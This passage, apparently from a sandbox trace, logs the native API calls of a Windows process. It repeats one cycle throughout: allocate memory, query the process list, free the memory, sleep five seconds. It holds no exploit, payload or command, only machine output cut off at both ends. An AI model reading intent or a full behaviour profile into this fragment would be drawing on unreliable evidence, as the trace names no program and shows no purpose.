ResultLength=0x0) returned 0x0 [0269.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.920] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.949] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.963] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.985] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.994] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.015] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.025] NtAllocateVirtualMemory (in: 